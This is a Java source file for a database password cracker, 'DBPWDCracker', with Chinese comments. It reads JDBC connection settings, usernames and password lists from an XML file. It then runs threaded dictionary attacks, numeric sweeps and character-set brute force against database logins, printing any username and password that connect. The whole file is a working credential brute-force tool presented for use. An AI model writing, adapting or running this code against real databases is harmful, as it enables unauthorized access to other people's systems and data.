package dbcracker; import java.sql.Connection; import java.sql.DriverManager; import java.util.*; public class DBPWDCracker { /** * Variables * */ String className=null, url="", user="root", pwd="sa", userFile="", pwdFile=""; String[] userList=null, pwdList=null; Connection connection=null; Conn conn=new Conn(); String xmlUrl="d://try//setting.xml"; XMLParseWorker settingXML=null; ArrayList<String> keyList=null; /** * Methods * */ /** * * main * */ public static void main(String[] args) { DBPWDCracker cracker=new DBPWDCracker(); //cracker.crackByList(); ArrayList<String> list=cracker.keyList; for(int i=0;i<cracker.keyList.size();i++){ System.out.println(cracker.keyList.get(i)); } //cracker.crackByList(); //cracker.crackNameFromListPWDIsNum(); //cracker.crackWithNameFromListPwdViolence(6, 6); //cracker.crackToDeath(4, 5, 6, 7); } public DBPWDCracker() { settingXML=new XMLParseWorker(xmlUrl); userList=settingXML.getValuesByElementName("user"); pwdList=settingXML.getValuesByElementName("pwd"); String[] urlList=settingXML.getValuesByElementName("url"); if(urlList.length>0){ url=urlList[0]; } String[] classList=settingXML.getValuesByElementName("className"); if(classList.length>0){ className=classList[0]; } try { Class.forName(className); } catch (ClassNotFoundException e) { System.out.println("`"+e); } initKeyList(); } /** * initKeyList * */ private void initKeyList() { keyList=new ArrayList<String>(); //分析passwor的类型,像keylist中加入 String[] pwdType=settingXML.getValuesByElementName("passwordType"); if(pwdType.length>0){ for(int i=0;i<pwdType.length;i++){ String type=pwdType[i]; System.out.println("pwdType="+type); if(type.equals("key_num")){ String[] keys=settingXML.getValuesByElementName("key_num"); for(int k=0;k<keys.length;k++){ keyList.add(keys[k]); } } else if(type.equals("key_high")){ String[] keys=settingXML.getValuesByElementName("key_high"); for(int k=0;k<keys.length;k++){ keyList.add(keys[k]); } } else if(type.equals("key_low")){ String[] keys=settingXML.getValuesByElementName("key_low"); for(int k=0;k<keys.length;k++){ keyList.add(keys[k]); } } else if(type.equals("key_spc")){ String[] keys=settingXML.getValuesByElementName("key_spc"); for(int k=0;k<keys.length;k++){ keyList.add(keys[k]); } } } } } /** * nextNum * */ private String nextOne(String num) { int len=num.length(); int last=len-1; { for(int i=last;i>=0;i--){ String end=num.substring(i+1); String str=num.substring(i,i+1); String start=num.substring(0,i); //System.out.println("str:`"+str+"start:`"+start+"end:`"+end); int index=keyList.indexOf(str); if(index==keyList.size()-1){//是最后一个元素 str=keyList.get(0); num=start+str+end; // System.out.println("num:`"+num); if(i==0){ num+=keyList.get(0); } continue; } else{ index++; num=start+keyList.get(index)+end; // System.out.println("num:`"+num+"index:"+index); return num; } } } return num; } /** * crackByList() * */ private void crackByList() { Thread thread =new Thread(new Thread(){ public void run() { findByList(); } }); thread.start(); } /** * findByList * */ private void findByList(){ XMLParseWorker settingXML=new XMLParseWorker(xmlUrl); String [] userList=settingXML.getValuesByElementName("user"); String [] pwdList=settingXML.getValuesByElementName("pwd"); String[] urlList=settingXML.getValuesByElementName( "url"); String[] classList=settingXML.getValuesByElementName( "className"); String url=null; String className=null; String userName=""; String password=""; if(urlList.length>0){ url=urlList[0]; } if(classList.length>0){ className=classList[0]; } try { Class.forName(className); } catch (ClassNotFoundException e) { System.out.println("`"+e); return; } connection=null; for(int i=0;i<userList.length;i++){ userName=userList[i]; for(int j=0;j<pwdList.length;j++){ password=pwdList[j]; connection=getConn(userName,password); if(connection!=null){ System.out.println("User:["+userName+"]PWD:["+password+"]"); } } } } /** * crackNameFromListPWDIsNum() * */ private void crackNameFromListPWDIsNum() { //从配置文件中读入user,组合暴力密码破解 Thread thread2=new Thread(new Thread(){ String userName=new String(user); String password=""; public void run() { for(int i=0;i<userList.length;i++){ userName=userList[i]; connection = null; for(int j=0;j<999999999;j++){ password=String.valueOf(j); //if(j%1000==0){//每1000个输出一下 // System.out.println("Now cracking proessing :`"+userName+"`"+password+"`"); //} connection=getConn(userName,password); if(connection!=null){ System.out.println("User:["+userName+"]PWD:["+password+"]"); } } } } }); thread2.start(); } /** * crackWithNameFromListPwdVelot(final int startLength,final int endLength) * */ private void crackWithNameFromListPwdViolence(final int startLength,final int endLength) { //从配置文件中读入user,组合暴力密码破解 Thread thread3=new Thread(new Thread(){ String userName=new String(user); String password=""; public void run() { //密码长度初始化 for(int a=0;a<startLength;a++){ password+=keyList.get(0); } //开始爆破 for(int i=0;i<userList.length;i++){ userName=userList[i]; //当密码长度小于最大长度时,动态密码检测 while(password.length()<=endLength){ connection = null; connection=getConn(userName,password); if(connection!=null){ System.out.println("User:["+userName+"]PWD:["+password+"]"); } //下一个密码 password=nextOne(password); } } } }); thread3.start(); } /** * crackToDeath * */ private void crackToDeath(final int nameStartLength,final int nameEndLength,final int pwdStartLength,final int pwdEndLength) { Thread thread4=new Thread(new Thread(){ String userName=""; String password=""; public void run() { //用户名长度初始化 for(int a=0;a<nameStartLength;a++){ userName+=keyList.get(0); } //密码长度初始化 for(int b=0;b<pwdStartLength;b++){ password+=keyList.get(0); } //开始爆破 while(userName.length()<=nameEndLength){//循环用户名 while(password.length()<=pwdEndLength){//循环密码 connection = null; connection=getConn(userName,password); if(connection!=null){ System.out.println("User:["+userName+"]PWD:["+password+"]"); } //下一个密码 password=nextOne(password); } //下个用户名 userName=nextOne(userName); } } }); thread4.start(); } /** * getConn * */ public Connection getConn(String user,String pwd){ Connection conn=null; try{ conn=DriverManager.getConnection(url,user,pwd); } catch(Exception ge){ } return conn; } }